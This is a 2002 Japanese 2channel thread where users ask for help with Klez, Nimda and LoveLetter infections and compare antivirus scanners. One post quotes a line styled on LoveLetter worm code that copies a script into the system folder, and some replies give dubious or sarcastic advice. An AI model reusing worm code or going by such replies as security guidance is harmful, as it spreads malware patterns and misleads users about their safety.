2 :
名無しさん@お腹いっぱい。 :02/07/23 13:14
5 :
名無しさん@お腹いっぱい。 :02/07/23 13:15
7 :
名無しさん@お腹いっぱい。 :02/07/23 13:19
ノートンインターネットセキュリティーを買ってきた。 で、セキュリティーをどのくらいにセットしとけば まあ安全でHPとめーるを観覧できるだろうか? 僕は初心者でパソコンはHP作ってネットショップ やってます。 どっかに教えてくれるスレある?
10 :
名無しさん@お腹いっぱい。 :02/07/23 13:38
11 :
名無しさん@お腹いっぱい。 :02/07/23 13:45
12 :
名無しさん@お腹いっぱい。 :02/07/23 14:04
14 :
名無しさん@お腹いっぱい。 :02/07/24 11:09
>>8 とりあえずデフォルト・推奨と書かれてる設定で使う。ノートンは知識なくても
一定レベルのセキュリティが確保できるのが利点。
17 :
名無しさん@お腹いっぱい。 :02/07/28 06:50
すみません、質問なんですがこの症状のウイルスを教えてください パソコンを起動してまもなく、DOSの窓が開き 「cドライブをフォーマットします」 と出て、「いいえ」を実行すると 「この処理はキャンセルできません」 とでて再起動をはじめました ちなみにまだ再起動はしていません ドライブをDに変更して中を見たところデータはまだ残っており ウイルスバスター(体験版)を実行したのですが検知できませんでした 名称がわからないと対処ができないので よろしくお願いします
19 :
名無しさん@お腹いっぱい。 :02/07/28 08:32
>>18 やはりイタズラプログラムっぽいですか
とりあえずそれらについて調べてみます
情報ありがとうございました
20 :
名無しさん@お腹いっぱい。 :02/07/28 09:23
以前このスレだったかどうかわからないのですが、「SU0.MPG」「SU1.MPG」 というファイルがドライブCにしらない間にできてしまい、消去しても またできてしまう、というのと同じ症状になり、再セットアップしたのですが、 また同じ症状がでてしました。再セットアップ後にネットをしている際に 「GAIN」というところの「Date Manager」というソフトがしらない間にインストール されてしまったりもしました。ファイウォールやスキャンなどしてはいるのですが。 どうかご教授お願いします。またスレ違いだったらどのスレにいけばいいか教えて いただけたら幸いです。お願い致します。
>>21 ありがとうございました。相談に逝ってきます。
17です イタズラプログラムについていろいろと調べてみたのですが、 該当するものが見つからず、行き詰まってしまいました 上記の条件に該当するイタズラプログラム、ウイルスは ほかにどのようなものがあるのかできれば教えてもらえませんか?
>>23 とりあえず、今残ってるデータは全てバックアップしとけ。
で、再インストールを奨める。
何か変なもの実行したりしなかった?
>>24 はい、とりあえず最低限のものはバックアップ中です
でも再インストール前に何に感染したのか知りたいので
なんとか情報をお願いします
変なものは特に実行してないと思います
>>25 ぶっちゃけた話、MXやってる?あるいは割れ物アプリ使ってるとか。
アンチウィルスソフトの定義ファイルが古すぎるとか。
そこんとこどうよ?
そこんとこは結構心当たりがあったりします アンチウィルスソフトはとりあえずバスタの体験版の最新を使ったので古すぎるということはないと思います
やはり製品版を買わなければだめですかね? 一応バスタのオンラインチェックもしてみたんですがそれも引っかかりませんでした
>>29 オンラインチェックで解決するなら製品版は売れない。
>>27 アンチウィルスソフトは定義ファイルを常に最新版に更新しないと
意味がない。しかもここ数日間かなり頻繁にアップデートしてるのでなおさら。
場合によっては自分だけでなく、知らないうちに他人にも迷惑を
かける可能性もあるので、素直にバスターもしくはノートンを買っとけ。
33 :
名無しさん@お腹いっぱい。 :02/07/29 16:02
35 :
名無しさん@お腹いっぱい。 :02/07/29 18:02
これ、Whiterとは違うのか?
実物が手に入らなかった。
37 :
名無しさん@お腹いっぱい :02/07/30 19:32
2ch見たら反応するウィルスの情報ってどこだっけ?
39 :
名無しさん@お腹いっぱい :02/07/30 22:05
>38 ありがとっ!
40 :
onnbody :02/08/01 05:52
お尋ねしたいのですが、どーやらウィルスにやられたようで まともに起動しなくなりました。 ファイルが壊れて 頭が”run is dos mode”と書き換えられてしまったようです。 いろんな開き方を試みましたが、開けませんでした。 メールやワードファイルなどを復旧したいのですが可能でしょうか?
41 :
名無しさん@お腹いっぱい。 :02/08/01 06:20
W32.Duni.Wormに感染しました。心配なのでリカバリーします。
>>40 なんのウィルスに感染したのかわからなければ、
すでにメールデータも感染している可能性があるので、
操作すること自体おすすめしない。あきらめるほかない。
それにそもそも DOS の基本コマンドとかわかる?わかっていた
としても、あなたの HDD のディレクトリ構造などこっちはわからんから
2ch のような掲示板で、操作を遠隔操作するのはまず不可能。
>>41 ???上書き再インストール???クリーンインストール???
43 :
onnbody :02/08/01 12:25
>>42 ディレクトリ作成と移動とファイルのコピーデリートくらいならなんとか。
もし可能なら、データ復旧会社みたいなところに頼んででも復旧させたいくらいなんですよ。
44 :
FIFA公認最新ランキング :02/08/01 14:50
1.Norton AntiVirus 2002 2.ウイルスバスター 2002 3.AntiVir Personal Edition 4.AVG 6.0 Free Edition 5.Avast Home Edition 6.Antidote 簡易版 7.ウイルスバスター Online 8.Panda ActiveScan 9.ウイルス警備隊 10.McACafee VirusScan Online 11.Symantec Securty Check ※オンラインスキャンはウイルススキャンの性能が良くても実用性の面で順位が下がっています
46 :
名無しさん@お腹いっぱい。 :02/08/01 16:36
MSNのメッセがウイルスにかかったようなのです。 登録してある友人のアドレスにウイルスメールが後を絶たないそうで… アンインストールしてもダメなのです。 ウイルスについては初心者同然なので全くどうしていいかわかりません。 どうしたらいいのでしょうか?
47 :
名無しさん@お腹いっぱい。 :02/08/01 16:41
ノートンのメル鯖、今おかしくない?
>>43 本当にウィルスにやられているんなら、データ復旧会社に
頼んだほうがよろし。
ただ、vxd ファイルなどがぶっ壊れているだけなら、
安い HDD 買ってくれば、その知識で十分復旧可能だと
思うんだけど?
49 :
onnbody :02/08/01 20:41
>>48 >ただ、vxd ファイルなどがぶっ壊れているだけなら、
それはどういう風に復旧すればよいのですか?簡単でいいので説明してください。
51 :
名無しさん@お腹いっぱい。 :02/08/02 01:31
ニュース速報版を見ていたらLOVE-LETTERに感染したよ・・・
52 :
ひみつの検疫さん :2024/12/20(金) 14:16:30 ID:MarkedRes
汚染を除去しました。
>>51 感染ヂャナクテ「検出」です。ンデモ漏れ的には「誤」はつきませんとおもうます。
ナ、ナ、ナンドイッタラワカルノデスカァ〜〜〜!!
某所で、EXEファイル落として実行したら、 なんか変な女の画像が画面いっぱいに出てきました。 ヤバイかな・・・・・・と思い、急いで電源を切り、 再起動すると、最初は何も起きないのですが、 少し経つと、また変な女の画像が画面いっぱいに・・・・・・ かなり不気味です。 気の弱い自分にとって、かなり嫌な存在です。 これはウィルスなのでしょうか? 一応、スキャンして、怪しいファイルなども消してみましたが、 なんか怖くて、再起動したくありません。 どうにかなりませんか?誰か自分を助けてください。
>>55 osはwinMEです
msconfigってなんですか?
初心者ですいません(汗
スタートアップにある怪しいショートカットを削除 スタートメニューのファイル名をして実行>msconfig>怪しい奴のチェックをはずす わからんかったら全部はずして、再起動をかけながら一つずつチェックを入れて探す つーかウイルスじゃねーだろ・・・
・手動削除手順: プログラムの自動起動設定を削除します:Windowsのシステムエディタ(SYSEDIT.EXE)などを使用して"WIN.INI"の記述を修正してください: 修正例: ・"WIN.INI"の"Run="の項目を修正 修正前:"Run = ozawa.exe" ↓ 修正後:"Run =" で、これのどこがわからんのか書け。
>>59 win.iniのRun = ozawa.exeの
ozawa.exeを消せばいいのですか(汗
わかりました。
ありがとうございます。
61 :
名無しさん@お腹いっぱい。 :02/08/02 18:28
age
62 :
名無しさん@お腹いっぱい。 :02/08/02 19:01
worm.win32.datomってのに感染したみたいなんですが msvxd.exeってのは削除してしまって大丈夫なんでしょうか
WORM_KLEZでは、
http://www.trendmicro.co.jp/klez/whats.asp にあるように、WQK.EXE 「PE_ELKERN.B」で検知します。
・Windows NT/2000/XP:WQK.DLL で検知します。
と説明されていますが、
私のWINDOWS\SYSTEMには、
WQK.exe、および、WQK.DLL
というファイルではなくて、ディテクトリ(フォルダ)が形成されており、
中には何のファイルもありません。
感染しているのかと思って、レジストリを調べてみましたが、
上記サイトにある、
\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
から削除すべき、
値:Krn132 = <Windowsのシステムディレクトリ>\Krn132.exe
値:WinSvc = <Windowsのシステムディレクトリ>\WinSvc.exe(WORM_KLEZ.Cの場合)
値:Wink??? = <Windowsのシステムディレクトリ>\WINK???.exe(WORM_KLEZ.Eの場合、「???」はランダムな文字列であり不定です)
値:wqk = <Windowsのシステムディレクトリ>\wqk.exe
が見当たりません。
これって、私のマシンは感染しているのでしょうか?
フォルダ更新時期が今年の5月になっていますが、妙なメールが沢山届くようになって
今日になって調べて初めて判明しました。
詳しい方ご教授お願いします。
64 :
名無しさん@お腹いっぱい。 :02/08/02 19:43
ウイルスウイルスって・・・馬鹿かおまえら。
(-_-)ウツダ
>>64 (´-`).。oO( スレタイ見る限りそれで当たり前
(´-`).。oO( 何がおかしいのか。
68 :
名無しさん@お腹いっぱい。 :02/08/03 13:41
長文で失礼します
Symantec Security Check
http://security2.norton.com/ssc/home.asp?langid=us&venid=sym&plfid=20&pkj=PNDUDTKJBTVISBYWWYP 上のURLに飛んで、ウィルスチェックをしたところ。
----------------------------------------------------------------------------------
Results of Virus Detection Scan
104098 files scanned, 4 file(s) infected.
Search for the name of the virus(s) listed below on the Symantec Security Response site for removal information.
A scan has not been run. To start Scan for Viruses, click here.
c:\WINDOWS\デスクトップ\かちゅーしゃ\log\money.2ch.net\stock\1015030446.dat is infected with VBS.LoveLetter.Var
c:\WINDOWS\デスクトップ\かちゅーしゃ\log\pc.2ch.net\sec\1000753945.dat is infected with VBS.LoveLetter.A
c:\WINDOWS\デスクトップ\かちゅーしゃ\log\pc.2ch.net\tech\993358225.dat is infected with JS.Exception.Exploit
c:\WINDOWS\デスクトップ\かちゅーしゃ\log\pc.2ch.net\tech\1026140108.dat is infected with VBS.LoveLetter.A
----------------------------------------------------------------------------------
このような結果が出て、4つのファイルがウィルスに感染している事がわかりました。
LoveLetterで検索したところ、やはり前にテレビでもよく流されていたウィルスだと確定。
このウィルスはOutlookに登録されているメールアドレスに自分を送信するらしいのですが
幸いOutlookをPCにインストールしていないので大丈夫だったようで安心したのですが
ここで、疑問がわいていきたのですが
このウィルスって題が「ILOVEYOU」という非常にわかりやすい題でとどくのですよね。
今まで、「ILOVEYOU」という題でメールが届いたことはないのです。
メーラーはEudora lightを使用し、添付されて送られてくるメールがいくつかあったのです
が、いっさい開いていません。添付ファイルを開いて実行しなければ感染はしないのですよね。
それともEudoraだと添付ファイル付きのメールを受信しただけで感染してしまっていたので
しょうか。
69 :
ひみつの検疫さん :2024/12/20(金) 14:16:30 ID:MarkedRes
汚染を除去しました。
>>70 どうもご親切にありがとうございます。
必死で、いろんなサイトを巡って調べてました。
でも、まあいろいろ勉強になったのでよしとします。
これをきっかけに、セキュリティの勉強でもしようかと思います
ありがとうございました。
>>68 どうでもいいけど
おいお前
”c:\WINDOWS\デスクトップ\かちゅーしゃ\log\”
何処にログフォルダ作ってるんだ
せめてProgram Filesに作れよ
それとも俺の勘違いか
>>72 勘違いではないです。そこに置いてますけど
なにか問題でもあるのでしょうか?
ひょっとして、ダウンしたアプリ類はProgram Filesに入れておいた
方がいいのですか?
74 :
なんでんきゃんでん :02/08/03 14:20
自分のパソコンがハッキングされているか調べる方法はありますか? また、それは他人からわかる事なのでしょうか? それとオンラインスキャンで何も発見されなかった場合、安心しても大丈夫でしょうか? 教えてください。
>>74 <それは他人からわかる事なのでしょうか?
??? 他人って誰の事よ?
>>73 まあ何処に置くも貴方のかってですが、
logも貯まると500Mbぐらいにまですぐになるからね
Program Filesに入れてショートカットをデスクトップに作るほうがいいと思う。
77 :
なんでんきゃんでん :02/08/03 14:30
他人って言うのは例えばここの板の人とか。
>>74 まず貴方のパソコンをハックする値打ちがあるか考えろ
>それとオンラインスキャンで何も発見されなかった場合、安心しても大丈夫でしょうか?
>教えてください。
何も発見されなかったのなら、大丈夫。
79 :
なんでんきゃんでん :02/08/03 14:34
ありがとうございます
>>78 ( ´_ゝ`)フーン じゃあ大丈夫と言う事にしておきましょう・・・・
81 :
なんでんきゃんでん :02/08/03 14:42
えっ!どういうことですか?
82 :
なんでんきゃんでん :02/08/03 14:53
教えてください!
>>76 なるほど。
アドバイス通り、Program Filesに入れてショートカット作成する
ことにします。
ありがとうございました。
84 :
名無しさん@お腹いっぱい。 :02/08/03 20:27
IPアドレス *** *** *** ***は、ハードウェアのアドレスが** ** ** に設定してあるシステムと競合していることが、検出されました。という表示が現れたのですが、どういうことでしょう!? 全然わからないADSLユーザーです。教えてください。
>>84 正確にメッセージ書け
ルータは使っているのか?PCは一台か?
87 :
名無しさん@お腹いっぱい。 :02/08/03 20:49
***の部分は、数字なんです。アドレスがわかると、2ch利用者に公開して しまうことになると思うので、書けません。PCは、一台です。ADSLモデムを 使用してます。
>>87 IPって、どうせ192.168.0.XXXあたりなんじゃないの?
だったら書いても大丈夫だぞ。
>>87 だから、ルータを使用しているのかって聞いてるんだろが
IPが何だってんだよ・・・
61.211.46.40 が俺のIPだ。一体、何を恐れる?
自分のは127.0.0.1ですた
>>89 「ソネット」デツカ
モレノトコト、チガタカライイデツ
93 :
名無しさん@お腹いっぱい。 :02/08/03 22:00
ソースネクストか・・・ フリーウェア以下のソフトしか作れない会社だっけ?
>>92 >さらに、新種ウイルスの発生や、Internet Explorerを始め
>とするWindows OSのセキュリティ修正プログラムの更新情報
>を、随時、ポップアップとセキュリティセンター上で表示する。
ナーンカ、、、スパイウェワぽいデツネ。。。
キタ━(゚∀゚)━!!初klez!! 遅い?
このたびめでたく nimda に感染しました。これは該当するウィルスが含まれている *.eml ファイルがディスク上に複数あることを確認したので確実です。 で、普段からウィルススキャンソフトをインストールしていなかった漏れは、「オンラインでスキャンできるやつがあったよなぁ」と思い立ち、 Symantec と TrendMicro のオンラインウィルススキャンを試してみたんです。 そしたら、 Syjmantec のほうは 17 個のウィルス入りファイルを見つけてくれたんですが、TrendMicro の方はなにも見つけてくれませんでした。オンラインなんで、どちらもパターンファイルは最新に近いものが自動的にダウンロードされていると思うんですが… 今まで時々 TrendMicro のオンラインスキャンは使っていたのですが、なんか信用できなくなってしまいました。どうなんでしょ? 友達にはいままで NAV でも買っておけば?といっていただけに、ちょっとショック。
>>97 オンラインスキャンとかはさ、Webに接続している間に感染活動を行って新たな被害者が出たりするから、使わない方がいいような気が。。。。
>>98 そうでつね。この板読んで、どのソフトがいいか検討してみます。
一ヶ月くらいのトライアル版も各社出してくれてるみたいだし。
それにしても、TrendMicro の On-line Scaner が Nimda を見落としたのには参った…
>>99-100 トレンドのオンラインスキャンは、圧縮ファイルでの検出力とかの点で弱いし。
警備隊v3でも書いたけど、ファイルスキャンで検出できなくても常時スキャンで何とかヒットする事もあるんで、インスコしているアンチウイルスソフトに代わるものでは無いっす。
>>99 Trendmicro の PC-cillin Trial Version ではちゃんと検出されました。
いろんな知り合いに呼ばれて、「ウィルスに感染してないか調べて」って言われるんですが、みんなウィルススキャンソフト持ってない。買えよって言いたくなるんですが、とりあえずその場をしのぐためにオンラインウィルススキャン使ってます。
いままでオンラインウィルススキャンはトレンドマイクロのしか使ったことなかったんですが、しマンテックも併用しよう。てか、マジでちゃんとソフト買おうと思います。しばらく PC-cillin Trial Version を使ってみます。1ヶ月使えるみたいなんで。
持ってないやつには素直にその場で「買え」っていいます。
あと↓とか。
無料ウィルス用ソフトAVP/AVG/Ad簡(その2
http://pc.2ch.net/test/read.cgi/sec/1027400238/l50
>>102 漏れ的には。
Norton入れた漏れのパソと、「感染?」パソをLANで直結。
クロスケーブルで繋ぐとなぜかうまくいかなかったりする時は、安ルーター使ってそれぞれプライベートIPアドレスにして、ルーターをゲートウェイにして、WEBに繋がない状態でスキャン。
でも最近では面倒なんで、HD外してスレーブ接続でやってまする。
体験版入れるってのもアリだけど、レトロウイルス(アンチウイルスソフトを落とすvilli)なら、駄目駄目っすけどね。
しかし何故バスターは、体験版はそこそこなのに、オンラインスキャンはいまいちなんでしょうね。謎。
製品版を買わせるためなんでは。<オンラインスキャンはいまいち 体験版がしょぼいと買ってくれないだろうから、こっちはそれなりのチェックができるようにしてるとか。
>>104 シマンテックはオンラインもかなりイイ!!
そのかわり、ファイル名レポートしてくれるだけで、削除とかはしてくれない。
トレンドマイクロもそうすればいいのにね。
だって、オンラインがしょぼかったら、
もういいや、ほかの会社のにしようと思っちゃうよ。
106 :
ひみつの検疫さん :2024/12/20(金) 14:16:30 ID:MarkedRes
汚染を除去しました。
107 :
名無しさん@お腹いっぱい。 :02/08/05 15:12
>>66 お前、何が嬉しくて生きてるんだ?
困ってるやつがいるんだから、邪魔する事はないだろう。
あっちこっち見渡して、陰湿な奴だな。
どうでもいいぽ
109 :
タスケテ厨房 :02/08/05 15:37
数ヶ月前から週一ぐらい定期的に(脳トン曰く)W32.Klez.H@mm付きのメールが来るんですが、毎回脳dの検疫行きになってます。 ヘッダを見るとReceived:の最初がいつも"p****-ip01sizuokaden.shizuoka.ocn.ne.jp"です。 ウザイので弾きたいのですが、メーラも鯖もドメインで弾くのに対応してないようで、直接向こうに言って止めさせたいのですが、 この場合OCNに連絡すればいいんでしょうか?
>>110 済みません、よく読んでませんでした。逝ってきます。ありがとう。
112 :
名無しさん@お腹いっぱい。 :02/08/05 16:16
113 :
名無しさん@お腹いっぱい。 :02/08/05 21:02
>>113 > これってウイルスに感染しちゃったんでしょうか?
「ウイルスに感染しちゃったんでしょうか?」と聞く前にウイルススキャンしろ!
115 :
名無しさん@お腹いっぱい。 :02/08/06 03:39
2ちゃんをうろついてたら VBS.LoveLetter.varと言うウィルスに感染してしまいました。 ラヴレター類はノートンで修復できる筈のウィルスと書いてあったのですが 駄目でした・・・。 LoveLetterの次の文字を調べたらvarと言うのは存在して いないみたいなので新種なんですか? 感染したファイルを削除しようと思ってもできません。 どなたかアドバイスを下さい。
隔離
117 :
名無しさん@お腹いっぱい。 :02/08/06 05:42
>>117 警察庁が個人にメールだすか?
なんかホームページで問い合わせたのか?
なけりゃどうしてわざわざメールだすのさ?
>>117 添付ファイルを見るには、オプション→セキュリティ→
ウイルスの可能性のある添付ファイルを…のチェックを外す。
メールヘッダの<Return-Path>、Receivedのあたりを見せてみ。
こんにちわ。 知り合いがプロバイダを7月いっぱいで解約したのですが、 その後8月5日に3つもウィルスらしきメールが来ました。 それも、解約したはずの前のプロバイダーで使っていたアドレス からです。 解約したアドレスからメールが来るなんてあるのでしょう か? ちなみにそれぞれ130Kバイトほどのメールです。hotmail に届いているので、ウィルスかどうかははっきりわかりません が、明らかにウィルスですよね^^; outlookに転送する以外にチェックする方法ってあるんでしょうか?
しつけ〜な。 質問に答える知識がないなら無視してくださいよ。
132 :
放置って・・・ :02/08/06 11:45
結局対策はみんなわかんないのかな〜?
次の質問者どうぞ〜
134 :
名無しさん@お腹いっぱい。 :02/08/06 11:50
135 :
放置って・・・ :02/08/06 12:06
やってもうた! ローマ字名のメールが来て、なんじゃらホイと右クリックしたら「ぴゅっ!」 て送ったみたい。 案の定、他社から電話来て「たぶんお宅から送られたと思うんだけどメール感染しました?」 だって...ああー2度目なんだよね。どうしてくれるーっ!!
>>118 すいませぬ・・。
>>120 >メールヘッダの<Return-Path>、Receivedのあたりを見せてみ。
From: keisatu <
[email protected] >
Return-Path:
[email protected] Delivered-To: CLUSTERHOST www.pub.to *********@pub.to
Received: (qmail 19550 invoked from network); 5 Aug 2002 21:11:09 +0900
Received: from ns1.dental-city.com ([210.231.99.197])
(envelope-sender <
[email protected] >)
by www.pub.to (qmail-ldap-1.03) with SMTP
for <*********@pub.to>; 5 Aug 2002 21:11:09 +0900
Received: from Zarihvx (p0323-ip02;;;;;;;;;.ocn.ne.jp [61.119.;;;.;;])
by ns1.dental-city.com (8.9.3+3.2W/8.9.3) with SMTP id VAA28500
for <********@pub.to>; Mon, 5 Aug 2002 21:09:11 +0900
ヘッダの見方が全くわかりませんが***@pub.toの転送アドレスに警察庁の名前できてたので素人目にはスゴクびびりました。
http://elsefiz.hypermart.net/cgi-bin1/image/079.jpg ↑
こっちのは試しに添付ファイル開いてみたけどなにもでませんでした(でもウィルスバスターの常駐してた右下のアイコン?が消えちゃって。。)
ホットメールってウィルス対策機能あるって聞いてたけど働いて無いのか・・
過去ログ読んでクレズウィルスの事少しは勉強してきまふ。。
139 :
名無しさん@お腹いっぱい。 :02/08/06 14:46
>>135 には状況がわかってるんだろうか?
>>135 のメル友の誰かがクレズにやられて、そいつのアドレス帳に載っていた
>>135 の古いメアドを騙って、
やはりそいつのアドレス帳に載っていた
>>135 の新しいメアドにクレズ入りメールを発信しただけの話だ。
>>138 だから、Return-Path: のメールアドレスが、感染者のアドレスなの。
symantec とか trendmaicro の解説をちゃんと読め。
klez は、From: を偽装するの。
http://www.ordb.org/lookup/?host=mail.dental-city.com このホストは ORDB.org に不正中継ホストとして登録されています。
データベースの検索結果: mail.dental-city.com (210.231.99.197)
データベースの検索結果: ns1.dental-city.com (210.231.99.197)
Look up this host in non-ORDB RBL's (May take a while to load)
ORDB.org への初回登録日時: 2001-08-23 16:06 GMT
初回送信ホスト: 202.36.148.21
最終検査日時: 2001-10-25 22:04 GMT
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin@groundzero.ordb.org
Received: from ns1.dental-city.com (unknown [210.231.99.197])
by groundzero.ordb.org (Postfix) with ESMTP id 545B25B1D0
for ; Thu, 25 Oct 2001 22:45:42 +0200 (CEST)
Received: from groundzero.ordb.org (groundzero.ordb.org [62.242.0.190])
by ns1.dental-city.com (8.9.3+3.2W/8.9.3) with ESMTP id FAA16331
for ; Fri, 26 Oct 2001 05:45:39 +0900
Date: Fri, 26 Oct 2001 05:45:39 +0900
Message-Id:<
[email protected] >
X-ORDB-Envelope-MAIL-FROM:
X-ORDB-Envelope-RCPT-TO:
From:
[email protected] To: marvin@ordb.org
Subject: ORDB.org check (0.1210261005908250.0448847324) (20)
最近急にKlezが届くようになった しかも宛先不明とヘッダーにある 不覚にもある日ぼ〜〜〜っとしていて開いてしまったよ 今日も4通、また流行りだした?
144 :
名無しさん@お腹いっぱい。 :02/08/07 21:02
Klez.eに感染しますた。 今、すべてリカバリーし直したんだけど これで大丈夫かな? それとも9月5日まで日にちがあったから 業者の人に駆除してもらえば良かったかな? リカバリーしても駄目ってことはないですよね? 馬鹿ですみませんが教えてください。 ネット上の無料チェックのソフトでやったら Klezともう一個別なのにも感染してたけど 英語だらけで駆除方法がわからないんだもの。。。
>>141 >Klez?は第三者中継が出来るサーバーを探すのか?
スッパマが感染しただけのことヂャネーノ??
>>144 EXEファイルとかデータファイル破壊されていなかったなら、駆除ツールで十分だったのに。
リカバリーしてハードディスクをフォーマット後にOSを新規インスコしたなら大丈夫ですが。
>英語だらけで駆除方法がわからないんだもの
アンチウイルスソフトを購入したらどうでしょか。
とりあえずVirus Baster 2002が一番初心者向けでトラブルが少ないです。
>>146 ありがとうございます。
知人からソフト貸してもらって
インストールします。
リカバリー後チェックしたら
もう大丈夫でした。
めちゃ手間がかかったので
これからは、メールには十分注意をしようと思っています。
>>144 >知人からソフト貸してもらって
>インストールします。
アンチウイルスソフトは、割れ(というか不正コピー)するとすぐバレたり、どちらかに不具合生じませんでしょか、社会的に。
せいぜい数千円なんで、買えばどうでしょ。
149 :
(;´Д`)....。 :02/08/07 22:15
>>147 >知人からソフト貸してもらって
>インストールします。
(;゚Д゚)ポカーン.....
love letter virusに感染して、なにも知らずに再起動してしまいました。 もうだめなんでしょうか。別のパソコンから書きこんでいます。 泣きそうです。
klezに感染したみたいです。 ウィルスバスター買って検索したらあっちこっち繁殖してました。klezて出てました。 元を断たなきゃだめみたいですね。結局、フォーマットして他のドライブに繁殖したファイルを 削除しました。 実害てどうなんでしょう?良くわかりません。でも迷惑な事はたしかです!
152 :
名無しさん@お腹いっぱい。 :02/08/07 22:48
>>151 実害?フォーマットして必要なファイルなくさなかったのか?
再インスコでかかった手間はどうだ?そういうことだ。
>>150 なぜ、も少し上のレスを読まないんでしょか。
>>153 >VBS.LoveLetter.var
これによるウィルススキャンソフトの誤作動ってことでしょうか。
そうではなさそうなんです。
WINDOWS\SISTEM32\CONFIG\SISTEM
が壊れてるとでてるので。
157 :
名無しさん@お腹いっぱい。 :02/08/07 23:35
2chにアクセスした途端、IEのテンポラリがVBS.LoveLetter.varに感染している旨の警告(NAV)が出たんだけど、俺だけ?
みんなは警告されただけでなんでおれは
>>156 みたいになってんのYO(泣
マサカトオモウケド、、、ラブレタ、htmlにねじ込んでバラマイテルヤシ・・・・ VBS_HAPTIMEミタク・・・・
>>160 SYSTEMをSISTEMと書くからじゃないのか?
>>162 書き間違いたんだYO!!(泣
もう再インスコするしかないぽ
あきらめるなYO!!
165 :
名無しさん@お腹いっぱい。 :02/08/08 00:39
>>163 害がなけりゃ放置していいんじゃないかな?
c.Copy(dirsystem&"\このスレ馬鹿ばっか(w.TXT.vbs")
167 :
vanbie :02/08/08 13:30
ここのページみるとノートン博士が毎回・・・です。 スキャンの種類: リアルタイム保護 スキャン イベント: ウィルスが見つかりました。 ウィルス名: VBS.LoveLetter.Var ファイル: C:\WINDOWS\Temporary Internet Files\Content.IE5\0X47KN0B\l50[2] 場所: 検疫 コンピュータ: ※※※ ユーザー: ○○○ 適用した処理: クリーニング 失敗 : 検疫 正常に完了 : アクセスが拒否されました 検出日: Thu Aug 08 13:27:31 2002
>>167 ガイシュツすぎて解説する気にもなれないのは俺だけじゃないはず
>>167 とりあえず前スレとか前々スレとか、このスレだったら38あたりでも見たら?
170 :
名無しさん@お腹いっぱい。 :02/08/08 14:26
2chでスレッドを表示しようとしたらノートンに引っかかりました。 検疫→削除と選択したのですが、書込み禁止のディスクのため削除できませんでした。 推奨とある隔離放置?(問題は広がりませんと表示されました。)したのですが 問題は無いのでしょうか? アドバイスをお願いします。
すぐ上で出ていましたね。 あせっていたので見落としてしまいました。 申し訳ないです。
172 :
名無しさん@お腹いっぱい。 :02/08/08 15:17
InterScan VirusWallのパターンファイルは 333(最新のはず) McAfee VirusScan のパターンファイルは 4.0.4127(最新) でスルーしてしまいます。 From:詐称。 題名:英文「Worm Kles.E immunity」他。 本文:ナシ。 添付:色々。 来たのは今日の昼、複数来てますんで新種かなと思われますが、 皆さんどうですか?
>>172 Kles.Eは初めて聞いたな。
Klez.Eなら山ほど来てるが。
174 :
名無しさん@お腹いっぱい。 :02/08/08 16:15
>>173 >Kles.Eは初めて聞いたな。
>Klez.Eなら山ほど来てるが
ケーブル抜いて、逝ってきます。
情報が錯綜してる様で、本文もある奴があったらしいです。
対応してる人間が複数いるので。
176 :
172,174 :02/08/08 16:24
>>175 ありがとうございます。
さっそく確認してみます。
179 :
名無しさん@お腹いっぱい。 :02/08/09 04:46
マルチするような奴は人柱になりなさいね
180 :
名無しさん@お腹いっぱい。 :02/08/09 08:58
件名「Let's be friends」ってメールが 添付ファイル付きで届いたんですが。 これもウィルスなんでしょうか 内容は見てません
>>180 Klez
っていうか大人しくノートン先生でも買え
これからも毎回ここで聞くつもりか?
>>182 CIHですか。
よく分からないですがウィルスなんですね
こんなのきたの初めてだったので…
おとなしくノートン先生を買いに逝ってきます。
どうやら自分はKlezウィルスに感染してしまったようです。 一応ノートンを使いウィルススキャンをして、 感染ファイルを検疫したのですが、これだけで解決するんでしょうか?心配です。
185 :
172(172,174,176) :02/08/09 11:09
どうやら不完全なウイルスの様でした。 メールを受信して添付を実行したPCから裏でメールの送信は有りませんでした。 From:詐称。 アドレス帳、inbox辺りから収集 題名:英文、色々。 本文:ナシ又は10行ほどの英文。 添付:色々。感染者のディスクから名前のみ使用。本体はナシ(実行後に確認、0バイト) メールで感染できないなら、どっかのWebで騙されて落として実行したのかな? お騒がせしました。
186 :
名無しさん@お腹いっぱい。 :02/08/09 12:21
>>185 知らないうちにウィルスばらまいてなかったってどうしてわかるの?
それと、たぶんキミの受け取ったメールはプロバイダで感染した添付部分を削除されてる。
>>186 SMTPのログで確認しましたが。
僕が受け取った訳ではなく他の作業者のPCですが。
>>172 で書いているようにInterScanをスルーして来たんですけど。
な に か ?
>>186 >>187 に追加。
ウイルスと思われるメールの送信先プロバイダの対応です。
FAQより
Q. 送信するメールについてウィルスチェックはされないのですか?
A. 受信するメールのみがウィルスチェックの対象となります。
さっぱり来てないし どうでもいいし キレルなら書き込むな
190 :
名無しさん@お腹いっぱい。 :02/08/10 20:12
やばいッス。PC起動しないッス。起動画面からジェンジェン動かない! ――――――――― マンキンかな? / ̄ ̄ ̄ ̄ ̄ ̄  ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ | (シラネーヨ) 日 M [] 0 U U レ――――――― ======〃∧_∧= U ∩ %(´∀` ) __ ∧ ∧__∧_∧__.)_ / ̄ ̄ ̄ ̄ ̄ ( ,,)日( )∇ < 困ったね。 ― / |―-( )―― \_____ (___ノ ━┳━) ━┳━ └┃―・゙  ̄ ┻ ̄ ̄ ̄ ┻ ̄ ̄ ̄ ̄
191 :
112.bmp :02/08/11 09:04
何か分からないけど、気がつくと色んなディレクトリに「112.bmp」という 中身はデスクトップのハードコピーが削除しても勝手に(?)作られてるんだが…。 何か変なウイルスとかの仕業かなぁ??? ※注:ノートンとThe Cleanerで検索したが発見されない。。。
193 :
名無しさん@お腹いっぱい。 :02/08/11 17:45
オンラインウィルスバスターでREG.STARTPAGE〜っていうウィルスを発見して 削除したら、パソコン起動時にエラーの表示が出て直らないので、ファイルを 復元して、結局ウィルスはパソコンの中に入ったままです。 ノートンでスキャンしても引っかからないので困ってます。
195 :
名無しさん@お腹いっぱい。 :02/08/11 22:31
>>191 一定時間ごとにスナップショット撮るようなソフトが
常駐してるんじゃないの?
197 :
名無しさん@お腹いっぱい。 :02/08/12 14:05
a funny game というメールがきた方いらしゃいます? 三日くらい前にも別のウイルスメールと思われるものがきたんですが、 差出人は同じようです。
>>197 立派なKlezと思われ。
差出人は偽装してあるから、キレて抗議メールなんかを送ったりしないように。
あとはKlezスレでどうぞ。
199 :
